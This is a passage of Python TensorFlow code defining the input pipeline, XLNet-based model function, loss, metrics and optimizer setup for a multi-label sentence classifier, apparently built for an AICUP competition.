dataset = tf.data.TFRecordDataset.list_files(\n file_pattern=params.tfrecord_pattern[mode],\n # A string or scalar string `tf.Tensor`, representing\n # the filename pattern that will be matched.\n shuffle=mode == tf.estimator.ModeKeys.TRAIN\n # If `True`, the file names will be shuffled randomly.\n # Defaults to `True`.\n )\n\n # Apply the interleave, prefetch, and shuffle first to reduce memory usage.\n\n # Preprocesses params.dataset_parallel_reads files concurrently and interleaves records from each file.\n def tfrecord_dataset(filename):\n return tf.data.TFRecordDataset(\n filenames=filename,\n # containing one or more filenames\n compression_type=None,\n # one of `\"\"` (no compression), `\"ZLIB\"`, or `\"GZIP\"`.\n buffer_size=params.dataset_buffer * 1024 * 1024\n # the number of bytes in the read buffer. 0 means no buffering.\n ) # 256 MB\n\n dataset = dataset.interleave(\n map_func=tfrecord_dataset,\n # A function mapping a nested structure of tensors to a Dataset\n cycle_length=params.dataset_parallel_reads,\n # The number of input Datasets to interleave from in parallel.\n block_length=1,\n # The number of consecutive elements to pull from an input\n # `Dataset` before advancing to the next input `Dataset`.\n num_parallel_calls=None\n )\n\n if mode == tf.estimator.ModeKeys.TRAIN:\n if tfversion[0] == 1 and tfversion[1] <= 13:\n dataset = dataset.apply(\n tf.contrib.data.shuffle_and_repeat(\n buffer_size=params.shuffle_buffer,\n # the maximum number elements that will be buffered when prefetching.\n count=params.repeat_count\n # the number of times the dataset should be repeated\n )\n )\n else:\n dataset = dataset.shuffle(buffer_size=params.shuffle_buffer)\n if params.repeat_count != 1:\n dataset = dataset.repeat(count=params.repeat_count)\n\n parse_fn = parse_aicup3_v16_tfrecords\n dataset = dataset.map(\n functools.partial(parse_fn, mode=mode, params=params),\n num_parallel_calls=int(params.num_cpu_threads / 2)\n )\n\n # Our inputs are variable length, so bucket, dynamic batch and pad them.\n # embed_dims = {\n # 'bert_uncased_L-12_H-768_A-12': 768,\n # 'bert_cased_L-12_H-768_A-12': 768,\n # 'bert_uncased_L-24_H-1024_A-16': 1024,\n # 'bert_cased_L-24_H-1024_A-16': 1024\n # }\n if mode != tf.estimator.ModeKeys.PREDICT:\n padded_shapes = (\n {\n # 'embeddings': [None, embed_dims[params.hub_model]],\n # 'title_embeddings': [768],\n 'title_pooled': [768],\n 'meta_pooled': [768],\n 'length': [],\n 'sentence_sequence_length': [],\n 'sentence_lengths': [None],\n 'sentence_labels': [None],\n 'article_labels': [],\n 'segment_ids': [None],\n 'authors': [None],\n 'categories': [None],\n 'fields': [None],\n 'year': [1],\n 'input_ids': [None],\n 'title_length': [],\n 'title_input_ids': [None],\n 'meta_length': [],\n 'meta_input_ids': [None]\n },\n [None]\n )\n dataset = dataset.apply(\n tf.data.experimental.bucket_by_sequence_length(\n element_length_func=lambda features, labels: features['length'],\n bucket_boundaries=[2**x for x in range(5, 13)],\n # [32, 64, 128, 256, 512, 1024, 2048, 4096, 8192, 16384]\n # [1024, 512, 256, 128, 64, 32, 16, 8, 4, 2, 1]\n bucket_batch_sizes=[\n min(params.batch_size * 2**x, params.max_batch_size)\n for x in range(8, -1, -1)\n ],\n padded_shapes=padded_shapes,\n padding_values=None, # Defaults to padding with 0.\n pad_to_bucket_boundary=False\n )\n )\n else:\n padded_shapes = {\n 'title_pooled': [768],\n 'meta_pooled': [768],\n 'length': [],\n 'sentence_sequence_length': [],\n 'sentence_lengths': [None],\n 'segment_ids': [None],\n 'authors': [None],\n 'categories': [None],\n 'fields': [None],\n 'year': [1],\n 'input_ids': [None],\n 'title_length': [],\n 'title_input_ids': [None],\n 'meta_length': [],\n 'meta_input_ids': [None]\n }\n dataset = dataset.padded_batch(\n params.predict_batch_size, padded_shapes=padded_shapes\n )\n\n dataset = dataset.prefetch(\n buffer_size=params.prefetch_buffer # 64 batches\n # A `tf.int64` scalar `tf.Tensor`, representing the\n # maximum number batches that will be buffered when prefetching.\n )\n return dataset\n\n\nclass RunConfig(object):\n \"\"\"RunConfig contains hyperparameters that could be different\n between pretraining and finetuning.\n These hyperparameters can also be changed from run to run.\n We store them separately from XLNetConfig for flexibility.\n \"\"\"\n def __init__(self, is_training, use_tpu, use_bfloat16, dropout, dropatt,\n init=\"normal\", init_range=0.1, init_std=0.02, mem_len=None,\n reuse_len=None, bi_data=False, clamp_len=-1, same_length=False):\n \"\"\"\n Args:\n is_training: bool, whether in training mode.\n use_tpu: bool, whether TPUs are used.\n use_bfloat16: bool, use bfloat16 instead of float32.\n dropout: float, dropout rate.\n dropatt: float, dropout rate on attention probabilities.\n init: str, the initialization scheme, either \"normal\" or \"uniform\".\n init_range: float, initialize the parameters with a uniform distribution\n in [-init_range, init_range]. Only effective when init=\"uniform\".\n init_std: float, initialize the parameters with a normal distribution\n with mean 0 and stddev init_std. Only effective when init=\"normal\".\n mem_len: int, the number of tokens to cache.\n reuse_len: int, the number of tokens in the currect batch to be cached\n and reused in the future.\n bi_data: bool, whether to use bidirectional input pipeline.\n Usually set to True during pretraining and False during finetuning.\n clamp_len: int, clamp all relative distances larger than clamp_len.\n -1 means no clamping.\n same_length: bool, whether to use the same attention length for each token.\n \"\"\"\n self.init = init\n self.init_range = init_range\n self.init_std = init_std\n self.is_training = is_training\n self.dropout = dropout\n self.dropatt = dropatt\n self.use_tpu = use_tpu\n self.use_bfloat16 = use_bfloat16\n self.mem_len = mem_len\n self.reuse_len = reuse_len\n self.bi_data = bi_data\n self.clamp_len = clamp_len\n self.same_length = same_length\n\n\ndef model_fn(features, labels, mode, params, config):\n # labels shape=(batch_size, sequence_length), dtype=int32\n is_train = mode == tf.estimator.ModeKeys.TRAIN\n\n # embeddings = features['embeddings']\n # embeddings shape=(batch_size, sequence_length, 768), dtype=float32\n # title_embeddings = features['title_embeddings']\n title_pooled = features['title_pooled']\n meta_pooled = features['meta_pooled']\n # embeddings shape=(batch_size, 768), dtype=float32\n lengths = features['length']\n # lengths shape=(batch_size, ), dtype=int32\n max_sentences = params.max_sentences\n sentence_sequence_lengths = features['sentence_sequence_length']\n # sentence_lengths = features['sentence_lengths']\n segment_ids = features['segment_ids']\n # segment_ids shape=(batch_size, sequence_length), dtype=int32\n authors = features['authors']\n categories = features['categories']\n fields = features['fields']\n year = features['year']\n input_ids = features['input_ids']\n title_lengths = features['title_length']\n title_input_ids = features['title_input_ids']\n meta_lengths = features['meta_length']\n meta_input_ids = features['meta_input_ids']\n global_step = tf.train.get_global_step()\n # global_step is assign_add 1 in tf.train.Optimizer.apply_gradients\n batch_size = tf.shape(lengths)[0]\n # number of sequences per epoch\n seq_total = batch_size\n if mode == tf.estimator.ModeKeys.TRAIN:\n seq_total = params.metadata['train']['articles']\n else:\n seq_total = params.metadata['test']['articles']\n\n task1_embeddings = tf.constant(params.metadata['task1_embeddings'])\n task2_embeddings = tf.constant(params.metadata['task2_embeddings'])\n if mode != tf.estimator.ModeKeys.PREDICT:\n sentence_labels = features['sentence_labels']\n sentence_labels_flat = tf.RaggedTensor.from_tensor(\n sentence_labels, padding=0\n ).flat_values\n sentence_classes = tf.nn.embedding_lookup(\n task1_embeddings, sentence_labels_flat\n )\n article_labels = features['article_labels']\n article_classes = tf.nn.embedding_lookup(\n task2_embeddings, article_labels\n )\n\n if params.use_tensor_ops:\n float_type = tf.float16\n else:\n float_type = tf.float32\n\n with tf.name_scope(\"masking\"):\n if mode != tf.estimator.ModeKeys.PREDICT:\n word_maxlen = tf.shape(labels)[1]\n else:\n word_maxlen = tf.shape(input_ids)[1]\n mask = tf.sequence_mask(\n lengths=lengths, maxlen=word_maxlen, dtype=float_type\n ) # 0 if padding\n meta_maxlen = tf.shape(meta_input_ids)[1]\n meta_mask = tf.sequence_mask(\n lengths=meta_lengths, maxlen=meta_maxlen, dtype=tf.int32\n ) # 0 if padding\n title_maxlen = tf.shape(title_input_ids)[1]\n title_mask = tf.sequence_mask(\n lengths=title_lengths, maxlen=title_maxlen, dtype=tf.int32\n ) # 0 if padding\n sentence_maxlen = tf.reduce_max(sentence_sequence_lengths)\n sentence_mask = tf.sequence_mask(\n lengths=sentence_sequence_lengths, maxlen=sentence_maxlen, dtype=tf.float32\n )\n all_probs_mask = tf.expand_dims(sentence_mask, axis=2)\n word_padding_mask = tf.cast(tf.math.equal(mask, 0), tf.float32)[:, tf.newaxis, tf.newaxis, :]\n sent_padding_mask = tf.cast(\n tf.math.equal(sentence_mask, 0), tf.float32\n )[:, tf.newaxis, tf.newaxis, :]\n meta_padding_mask = tf.cast(tf.math.equal(meta_mask, 0),\n tf.float32)[:, tf.newaxis, tf.newaxis, :]\n title_padding_mask = tf.cast(tf.math.equal(title_mask, 0),\n tf.float32)[:, tf.newaxis, tf.newaxis, :]\n authors_padding_mask = tf.cast(tf.math.equal(authors, 0),\n tf.float32)[:, tf.newaxis, tf.newaxis, :]\n categories_padding_mask = tf.cast(tf.math.equal(categories, 0),\n tf.float32)[:, tf.newaxis, tf.newaxis, :]\n fields_padding_mask = tf.cast(tf.math.equal(fields, 0),\n tf.float32)[:, tf.newaxis, tf.newaxis, :]\n # mask shape=(batch_size, sequence_length), dtype=float32\n\n ## ckpt method\n init_checkpoint_root = Path(params.init_checkpoint_root)\n xlnet_config_file = str(init_checkpoint_root / 'xlnet_config.json')\n xlnet_config = xlnet.XLNetConfig(json_path=xlnet_config_file)\n\n with tf.variable_scope('abstract'):\n if params.use_xlnet_zero_seg_ids:\n seg_id = tf.zeros_like(tf.transpose(segment_ids, [1, 0]), dtype=tf.int32) # int32\n else:\n seg_id = tf.transpose(segment_ids, [1, 0]) # int32\n inp = tf.transpose(input_ids, [1, 0]) # int32\n inp_mask = tf.transpose(tf.cast(tf.math.equal(mask, 0), tf.float32), [1, 0]) # float32\n run_config = RunConfig(\n is_training=is_train,\n use_tpu=False,\n use_bfloat16=False,\n dropout=params.xlnet_dropout,\n dropatt=params.xlnet_dropout\n )\n abstract_model = xlnet.XLNetModel(\n xlnet_config=xlnet_config,\n run_config=run_config,\n input_ids=inp,\n seg_ids=seg_id,\n input_mask=inp_mask\n )\n abstract_features = tf.transpose(abstract_model.get_sequence_output(), [1, 0, 2])\n abstract_pooled = abstract_model.get_pooled_out('first', False)\n bert_hidden_size = abstract_features.shape[-1].value\n\n # init_from_checkpoint\n init_checkpoint = str(init_checkpoint_root / params.ckpt_name)\n tf.train.init_from_checkpoint(init_checkpoint, {'/': 'abstract/'})\n\n # with tf.variable_scope('title'):\n # title_inp = tf.transpose(title_input_ids, [1, 0]) # int32\n # title_inp_mask = tf.transpose(tf.cast(tf.math.equal(title_mask, 0), tf.float32), [1, 0]) # float32\n # run_config = RunConfig(\n # is_training=is_train,\n # use_tpu=False,\n # use_bfloat16=False,\n # dropout=params.xlnet_dropout,\n # dropatt=params.xlnet_dropout\n # )\n # title_model = xlnet.XLNetModel(\n # xlnet_config=xlnet_config,\n # run_config=run_config,\n # input_ids=title_inp,\n # seg_ids=tf.zeros_like(title_inp, tf.int32),\n # input_mask=title_inp_mask\n # )\n # title_features = tf.transpose(title_model.get_sequence_output(), [1, 0, 2])\n # # init_from_checkpoint\n # tf.train.init_from_checkpoint(init_checkpoint, {'/': 'title/'})\n\n if params.attend_to == 'authors':\n with tf.variable_scope('authors', values=[authors]):\n authors_vocab = len(params.metadata['authors_categories']) # 6216\n authors_features = tf.keras.layers.Embedding(\n input_dim=authors_vocab,\n output_dim=bert_hidden_size, # 64\n embeddings_initializer=tf.truncated_normal_initializer(stddev=0.02),\n embeddings_regularizer=None,\n activity_regularizer=None,\n embeddings_constraint=None,\n mask_zero=False,\n input_length=None\n )(inputs=authors)\n # authors_features: shape=(batch_size, authors_length, 768), dtype=float32\n attend_to = authors_features\n attend_to_mask = authors_padding_mask\n elif params.attend_to == 'categories':\n with tf.variable_scope('categories', values=[categories]):\n categories_vocab = len(params.metadata['cats_categories']) # 140\n categories_features = tf.keras.layers.Embedding(\n input_dim=categories_vocab,\n output_dim=bert_hidden_size, # 256\n embeddings_initializer=tf.truncated_normal_initializer(stddev=0.02),\n embeddings_regularizer=None,\n activity_regularizer=None,\n embeddings_constraint=None,\n mask_zero=False,\n input_length=None\n )(inputs=categories)\n # categories_features: shape=(batch_size, categories_length, 768), dtype=float32\n attend_to = categories_features\n attend_to_mask = categories_padding_mask\n elif params.attend_to == 'fields':\n with tf.variable_scope('fields', values=[fields]):\n fields_vocab = len(params.metadata['fields_categories']) # 22\n fields_features = tf.keras.layers.Embedding(\n input_dim=fields_vocab,\n output_dim=bert_hidden_size, # 16\n embeddings_initializer=tf.truncated_normal_initializer(stddev=0.02),\n embeddings_regularizer=None,\n activity_regularizer=None,\n embeddings_constraint=None,\n mask_zero=False,\n input_length=None\n )(inputs=fields)\n # fields_features: shape=(batch_size, fields_length, 768), dtype=float32\n attend_to = fields_features\n attend_to_mask = fields_padding_mask\n elif params.attend_to == 'year':\n with tf.variable_scope('year', values=[year]):\n year_vocab = len(params.metadata['year_categories']) # 6216\n year_features = tf.keras.layers.Embedding(\n input_dim=year_vocab,\n output_dim=bert_hidden_size, # 768\n embeddings_initializer=tf.truncated_normal_initializer(stddev=0.02),\n embeddings_regularizer=None,\n activity_regularizer=None,\n embeddings_constraint=None,\n mask_zero=False,\n input_length=None\n )(inputs=year)\n # year_features shape=(batch_size, 1, 768), dtype=float32\n attend_to = year_features\n attend_to_mask = None\n else:\n attend_to = abstract_features\n attend_to_mask = word_padding_mask\n\n # with tf.variable_scope('input'):\n # catagorical_input = tf.concat(values=[year_features, authors_features, categories_features, fields_features], axis=1)\n # # catagorical_length = tf.shape(catagorical_input)[1]\n # catagorical_input = tf.keras.layers.LayerNormalization(\n # axis=-1,\n # epsilon=0.001,\n # center=True,\n # scale=True,\n # beta_initializer='zeros',\n # gamma_initializer='ones',\n # beta_regularizer=None,\n # gamma_regularizer=None,\n # beta_constraint=None,\n # gamma_constraint=None,\n # trainable=True,\n # name=None\n # )(inputs=catagorical_input)\n # catagorical_input = tf.keras.layers.Dropout(\n # rate=params.embedded_dropout, # 0.2\n # noise_shape=None,\n # seed=None,\n # )(inputs=catagorical_input, training=is_train)\n # if params.attend_to == 'title':\n # attend_to = title_features\n # attend_to_mask = title_padding_mask\n\n # bidirectional rnn\n with tf.variable_scope('word_decoder'):\n outputs = abstract_features\n # if params.use_transformer_positional_encoding:\n # outputs += positional_encoding(max_sentences, params.sent_transformer_d_model)[:, :sentence_maxlen, :]\n for i in range(params.word_num_layers):\n outputs = DecoderLayer(\n d_model=params.word_d_model,\n num_heads=int(params.word_d_model / 64),\n dff=int(params.word_d_model * params.word_dff_x),\n rate=params.word_dropout_rate\n )(\n training=is_train,\n inputs=outputs,\n inputs_mask=word_padding_mask,\n # attend_to=catagorical_input,\n # attend_to_mask=None\n attend_to=attend_to,\n attend_to_mask=attend_to_mask\n )\n # (batch_size, input_seq_len, d_model)\n # outputs = DecoderLayer5v4(\n # d_model=params.word_d_model,\n # num_heads=int(params.word_d_model / 64),\n # dff=int(params.word_d_model * params.word_dff_x),\n # rate=params.word_dropout_rate\n # )(\n # training=is_train,\n # inputs=outputs,\n # inputs_mask=word_padding_mask,\n # title=title_features,\n # title_mask=title_padding_mask,\n # authors=authors_features,\n # authors_mask=authors_padding_mask,\n # categories=categories_features,\n # categories_mask=categories_padding_mask,\n # fields=fields_features,\n # fields_mask=fields_padding_mask,\n # year=year_features,\n # year_mask=None\n # )\n # (batch_size, input_seq_len, d_model)\n\n with tf.variable_scope('sentence_pooling'):\n word_outputs = outputs\n sentence_inputs = tf.reshape(\n tensor=tf.map_fn(\n lambda i: tf.concat(\n [\n tf.slice(\n [\n tf.nn.relu(tf.reduce_max(s, axis=0))\n for s in tf.dynamic_partition(\n data=tf.slice(\n outputs[i], [0, 0],\n [lengths[i],\n tf.shape(outputs)[-1]]\n ),\n partitions=tf.\n slice(segment_ids[i], [0], [lengths[i]]),\n num_partitions=max_sentences\n )\n ], [0, 0],\n [sentence_maxlen,\n tf.shape(outputs)[-1]]\n )\n ],\n axis=1\n ), tf.range(batch_size), tf.float32\n ),\n shape=[batch_size, sentence_maxlen, outputs.shape[-1]]\n )\n\n # bidirectional rnn\n with tf.variable_scope('sent_decoder'):\n outputs = sentence_inputs\n if params.sent_num_layers > 0 and params.use_transformer_positional_encoding:\n outputs += positional_encoding(max_sentences, params.sent_d_model\n )[:, :sentence_maxlen, :]\n for i in range(params.sent_num_layers):\n outputs = DecoderLayer(\n d_model=params.sent_d_model,\n num_heads=int(params.sent_d_model / 64),\n dff=int(params.sent_d_model * params.sent_dff_x),\n rate=params.sent_dropout_rate\n )(\n training=is_train,\n inputs=outputs,\n inputs_mask=sent_padding_mask,\n # attend_to=catagorical_input,\n # attend_to_mask=None\n attend_to=attend_to,\n attend_to_mask=attend_to_mask\n )\n # (batch_size, input_seq_len, d_model)\n # outputs = DecoderLayer5v4(\n # d_model=params.sent_d_model,\n # num_heads=int(params.sent_d_model / 64),\n # dff=int(params.sent_d_model * params.sent_dff_x),\n # rate=params.sent_dropout_rate\n # )(\n # training=is_train,\n # inputs=outputs,\n # inputs_mask=sent_padding_mask,\n # title=title_features,\n # title_mask=title_padding_mask,\n # authors=authors_features,\n # authors_mask=authors_padding_mask,\n # categories=categories_features,\n # categories_mask=categories_padding_mask,\n # fields=fields_features,\n # fields_mask=fields_padding_mask,\n # year=year_features,\n # year_mask=None\n # )\n # (batch_size, input_seq_len, d_model)\n\n # dense layer\n with tf.variable_scope('sentence_dense'):\n if params.sent_dense_units[0] != None:\n for i, units in enumerate(params.sent_dense_units): # [256,128,64]\n with tf.variable_scope(f'dense_{i}_{units}'):\n outputs = tf.keras.layers.Dense(\n units=units,\n activation=gelu,\n use_bias=True,\n kernel_initializer=tf.truncated_normal_initializer(\n stddev=0.02\n ),\n bias_initializer='zeros',\n kernel_regularizer=None,\n bias_regularizer=None,\n activity_regularizer=None,\n kernel_constraint=None,\n bias_constraint=None\n )(inputs=outputs)\n outputs = tf.keras.layers.Dropout(\n rate=params.dense_dropout, # 0.2\n noise_shape=None,\n seed=None,\n )(inputs=outputs, training=is_train)\n # logits shape=(batch_size, sequence_length, num_classes), dtype=float32\n \n # with tf.variable_scope('article_dense'):\n # article_outputs = abstract_pooled\n # if params.arti_dense_units[0] != None:\n # for i, units in enumerate(params.arti_dense_units): # [256,128,64]\n # with tf.variable_scope(f'dense_{i}_{units}'):\n # article_outputs = tf.keras.layers.Dense(\n # units=units,\n # activation=gelu,\n # use_bias=True,\n # kernel_initializer=tf.truncated_normal_initializer(\n # stddev=0.02\n # ),\n # bias_initializer='zeros',\n # kernel_regularizer=None,\n # bias_regularizer=None,\n # activity_regularizer=None,\n # kernel_constraint=None,\n # bias_constraint=None\n # )(inputs=article_outputs)\n # article_outputs = tf.keras.layers.Dropout(\n # rate=params.dense_dropout, # 0.2\n # noise_shape=None,\n # seed=None,\n # )(inputs=article_outputs, training=is_train)\n # # logits shape=(batch_size, sequence_length, num_classes), dtype=float32\n\n # output layer\n with tf.variable_scope('output'):\n logits = tf.layers.dense(\n inputs=outputs,\n units=6,\n activation=None,\n use_bias=True,\n kernel_initializer=tf.truncated_normal_initializer(stddev=0.02),\n bias_initializer=tf.zeros_initializer(dtype=float_type),\n kernel_regularizer=None,\n bias_regularizer=None,\n activity_regularizer=None,\n kernel_constraint=None,\n bias_constraint=None,\n trainable=True,\n name='dense',\n reuse=None\n )\n # logits shape=(batch_size, sequence_length, num_classes), dtype=float32\n # with tf.variable_scope('article_output'):\n # article_logits = tf.layers.dense(\n # inputs=article_outputs,\n # units=4,\n # activation=None,\n # use_bias=True,\n # kernel_initializer=tf.truncated_normal_initializer(stddev=0.02),\n # bias_initializer=tf.zeros_initializer(dtype=float_type),\n # kernel_regularizer=None,\n # bias_regularizer=None,\n # activity_regularizer=None,\n # kernel_constraint=None,\n # bias_constraint=None,\n # trainable=True,\n # name='dense',\n # reuse=None\n # )\n # # article_logits shape=(batch_size, 4), dtype=float32\n\n # loss\n if mode != tf.estimator.ModeKeys.PREDICT:\n with tf.variable_scope('loss'):\n losses = tf.nn.weighted_cross_entropy_with_logits(\n labels=tf.cast(\n tf.nn.embedding_lookup(\n task1_embeddings, sentence_labels\n ), tf.float32\n ) * params.scale_label + (1 - params.scale_label) / 2.0,\n logits=tf.cast(logits, tf.float32),\n pos_weight=params.loss_pos_weight\n )\n masked_losses = losses * all_probs_mask\n # losses shape=(batch_size, sequence_length, 6), dtype=float32\n # average across batch_size and sequence_length\n loss = tf.reduce_sum(masked_losses) / \\\n tf.cast(tf.reduce_sum(sentence_sequence_lengths), dtype=tf.float32)\n # # tf.summary.scalar('loss', loss)\n # with tf.variable_scope('article_loss'):\n # article_losses = tf.nn.weighted_cross_entropy_with_logits(\n # labels=tf.cast(\n # tf.nn.embedding_lookup(\n # task2_embeddings, article_labels\n # ), tf.float32\n # ) * params.scale_label + (1 - params.scale_label) / 2.0,\n # logits=tf.cast(article_logits, tf.float32),\n # pos_weight=params.article_loss_pos_weight\n # )\n # loss += tf.reduce_sum(article_losses) / tf.cast(batch_size, dtype=tf.float32)\n\n # predictions\n #\n with tf.variable_scope('predictions'):\n predictions = {}\n all_probs = tf.sigmoid(x=logits, name='sigmoid') * all_probs_mask\n # all_probs shape=(batch_size, target_output_lengths, 6), dtype=float32\n predicted_sentence_class_scores = tf.RaggedTensor.from_tensor(\n all_probs, lengths=sentence_sequence_lengths, ragged_rank=1\n ).flat_values\n # predicted_sentence_class_scores shape=(number_sentences_in_batch, 6), dtype=float32\n predictions['predicted_sentence_class_scores'] = predicted_sentence_class_scores\n predicted_sentence_classes = tf.cast(\n predicted_sentence_class_scores > params.predict_threshold,\n tf.int32\n )\n predictions['predicted_sentence_classes'] = predicted_sentence_classes\n # predicted_article_class_scores = tf.sigmoid(x=article_logits, name='sigmoid')\n # predictions['predicted_article_class_scores'] = predicted_article_class_scores\n # predicted_article_classes = tf.cast(\n # predicted_article_class_scores > params.article_predict_threshold,\n # tf.int32\n # )\n # predictions['predicted_article_classes'] = predicted_article_classes\n \n # default saver is added in estimator._train_with_estimator_spec\n # training.Saver(\n # sharded=True,\n # max_to_keep=self._config.keep_checkpoint_max,\n # keep_checkpoint_every_n_hours=(\n # self._config.keep_checkpoint_every_n_hours),\n # defer_build=True,\n # save_relative_paths=True)\n scaffold = tf.train.Scaffold(\n saver=tf.train.Saver(\n sharded=False,\n max_to_keep=config.keep_checkpoint_max,\n keep_checkpoint_every_n_hours=(\n config.keep_checkpoint_every_n_hours\n ),\n defer_build=True,\n save_relative_paths=True\n )\n )\n\n if mode == tf.estimator.ModeKeys.PREDICT:\n return tf.estimator.EstimatorSpec(\n mode=mode,\n predictions=predictions, # PREDICT\n export_outputs={ # DEFAULT_SERVING_SIGNATURE_DEF_KEY = \"serving_default\"\n # tf.saved_model.DEFAULT_SERVING_SIGNATURE_DEF_KEY: tf.estimator.export.PredictOutput(predictions)\n },\n scaffold=scaffold,\n prediction_hooks=None\n )\n\n with tf.variable_scope(\n 'batch_metrics', values=[sentence_classes, predicted_sentence_classes]\n ):\n # with tf.control_dependencies([print_op]):\n is_correct = tf.cast(\n tf.equal(sentence_classes, predicted_sentence_classes), tf.float32\n )\n num_values = tf.ones_like(is_correct)\n batch_accuracy = tf.math.divide(\n tf.reduce_sum(is_correct), tf.reduce_sum(num_values)\n )\n TP = tf.cast(\n tf.count_nonzero(predicted_sentence_classes * sentence_classes),\n tf.float32\n )\n FP = tf.cast(\n tf.count_nonzero(\n predicted_sentence_classes * (sentence_classes - 1)\n ), tf.float32\n )\n FN = tf.cast(\n tf.count_nonzero(\n (predicted_sentence_classes - 1) * sentence_classes\n ), tf.float32\n )\n batch_precision = tf.math.divide_no_nan(TP, (TP + FP))\n batch_recall = tf.math.divide_no_nan(TP, (TP + FN))\n batch_f1 = tf.math.divide_no_nan(\n 2 * batch_precision * batch_recall,\n (batch_precision + batch_recall)\n )\n tf.summary.scalar('batch_accuracy', batch_accuracy)\n tf.summary.scalar('batch_precision', batch_precision)\n tf.summary.scalar('batch_recall', batch_recall)\n tf.summary.scalar('batch_f1', batch_f1)\n\n # with tf.variable_scope(\n # 'batch_metrics_article', values=[article_classes, predicted_article_classes]\n # ):\n # # with tf.control_dependencies([print_op]):\n # is_correct_article = tf.cast(\n # tf.equal(article_classes, predicted_article_classes), tf.float32\n # )\n # num_values_article = tf.ones_like(is_correct_article)\n # batch_accuracy_article = tf.math.divide(\n # tf.reduce_sum(is_correct_article), tf.reduce_sum(num_values_article)\n # )\n # TP_article = tf.cast(\n # tf.count_nonzero(predicted_article_classes * article_classes),\n # tf.float32\n # )\n # FP_article = tf.cast(\n # tf.count_nonzero(\n # predicted_article_classes * (article_classes - 1)\n # ), tf.float32\n # )\n # FN_article = tf.cast(\n # tf.count_nonzero(\n # (predicted_article_classes - 1) * article_classes\n # ), tf.float32\n # )\n # batch_precision_article = tf.math.divide_no_nan(TP_article, (TP_article + FP_article))\n # batch_recall_article = tf.math.divide_no_nan(TP_article, (TP_article + FN_article))\n # batch_f1_article = tf.math.divide_no_nan(\n # 2 * batch_precision_article * batch_recall_article,\n # (batch_precision_article + batch_recall_article)\n # )\n # tf.summary.scalar('batch_accuracy_article', batch_accuracy_article)\n # tf.summary.scalar('batch_precision_article', batch_precision_article)\n # tf.summary.scalar('batch_recall_article', batch_recall_article)\n # tf.summary.scalar('batch_f1_article', batch_f1_article)\n\n if mode == tf.estimator.ModeKeys.EVAL:\n\n def metric_fn(labels, predictions, scores):\n metrics = {\n 'auc': tf.metrics.auc(\n labels=labels,\n predictions=scores,\n ),\n 'f1_score': tf.contrib.metrics.f1_score(\n labels=labels,\n predictions=scores,\n ),\n 'f1_class': tf.contrib.metrics.f1_score(\n labels=labels,\n predictions=predictions,\n ),\n 'precision': tf.metrics.precision(\n labels=labels,\n predictions=predictions,\n ),\n 'recall': tf.metrics.recall(\n labels=labels,\n predictions=predictions,\n )\n # 'auc_article': tf.metrics.auc(\n # labels=labels_article,\n # predictions=scores_article,\n # ),\n # 'f1_score_article': tf.contrib.metrics.f1_score(\n # labels=labels_article,\n # predictions=scores_article,\n # ),\n # 'f1_class_article': tf.contrib.metrics.f1_score(\n # labels=labels_article,\n # predictions=predictions_article,\n # ),\n # 'precision_article': tf.metrics.precision(\n # labels=labels_article,\n # predictions=predictions_article,\n # ),\n # 'recall_article': tf.metrics.recall(\n # labels=labels_article,\n # predictions=predictions_article,\n # )\n }\n if params.eval_precision_recall_at_equal_thresholds == True:\n metrics['precision_recall_at_equal_thresholds'] = tf.contrib.metrics.precision_recall_at_equal_thresholds(\n labels=tf.cast(labels, tf.bool),\n predictions=scores,\n weights=None,\n num_thresholds=1001,\n use_locking=True\n )\n # metrics['precision_recall_at_equal_thresholds_article'] = tf.contrib.metrics.precision_recall_at_equal_thresholds(\n # labels=tf.cast(labels_article, tf.bool),\n # predictions=scores_article,\n # weights=None,\n # num_thresholds=1001,\n # use_locking=True\n # )\n return metrics\n\n eval_metric_ops = metric_fn(\n sentence_classes, predicted_sentence_classes,\n predicted_sentence_class_scores\n # article_classes, predicted_article_classes,\n # predicted_article_class_scores\n )\n\n return tf.estimator.EstimatorSpec(\n mode=mode,\n loss=loss, # EVAL, TRAIN\n eval_metric_ops=eval_metric_ops, # EVAL\n scaffold=scaffold,\n evaluation_hooks=None\n )\n\n # optimizer list\n optimizers = {\n 'adagrad':\n tf.train.AdagradOptimizer,\n 'adam':\n lambda lr: tf.train.AdamOptimizer(lr, epsilon=params.adam_epsilon),\n # lambda lr: tf.train.AdamOptimizer(lr, epsilon=1e-08),\n 'nadam':\n lambda lr: tf.contrib.opt.\n NadamOptimizer(lr, epsilon=params.adam_epsilon),\n 'ftrl':\n tf.train.FtrlOptimizer,\n 'momentum':\n lambda lr: tf.train.MomentumOptimizer(lr, momentum=0.9),\n 'rmsprop':\n tf.train.RMSPropOptimizer,\n 'sgd':\n tf.train.GradientDescentOptimizer,\n }\n\n # optimizer\n with tf.variable_scope('optimizer'):\n # clip_gradients = params.gradient_clipping_norm\n clip_gradients = adaptive_clipping_fn(\n std_factor=params.clip_gradients_std_factor, # 2.\n decay=params.clip_gradients_decay, # 0.95\n static_max_norm=params.clip_gradients_static_max_norm, # 6.\n global_step=global_step,\n report_summary=True,\n epsilon=np.float32(1e-7),\n name=None\n )\n\n def learning_rate_warmup(\n global_step,\n warmup_steps,\n repeat_steps=0,\n start=0.01,\n warmup_schedule='exp'\n ):\n \"\"\"Learning rate warmup multiplier.\"\"\"\n local_step = global_step\n if repeat_steps > 0:\n local_step = global_step % repeat_steps\n if not warmup_steps:\n return tf.constant(1.)\n\n tf.logging.info(\n 'Applying %s learning rate warmup for %d steps',\n warmup_schedule, warmup_steps\n )\n\n local_step = tf.cast(local_step, dtype=tf.float32)\n warmup_steps = tf.cast(warmup_steps, dtype=tf.float32)\n start = tf.cast(start, dtype=tf.float32)\n warmup = tf.constant(1.)\n if warmup_schedule == 'exp':\n warmup = tf.exp(tf.log(start) / warmup_steps\n )**(warmup_steps - local_step)\n else:\n assert warmup_schedule == 'linear'\n warmup = (\n (tf.constant(1.) - start) / warmup_steps\n ) * local_step + start\n return tf.where(local_step < warmup_steps, warmup, tf.constant(1.))\n\n decay = params.learning_rate_decay_fn.lower()\n lr_schedule = 1.0 # if not decay or decay == 'none':\n if decay == 'noisy_linear_cosine_decay':\n lr = tf.train.noisy_linear_cosine_decay(\n params.learning_rate,\n global_step,\n decay_steps=params.learning_rate_decay_steps, # 27000000\n initial_variance=1.0,\n variance_decay=0.55,\n num_periods=0.5,\n alpha=0.0,\n beta=0.001,\n name=None\n )\n elif decay == 'exponential_decay':\n schedule = tf.keras.optimizers.schedules.ExponentialDecay(\n initial_learning_rate=1.0,\n decay_steps=params.learning_rate_decay_steps, # 27000000\n decay_rate=params.learning_rate_decay_rate, # 0.95\n 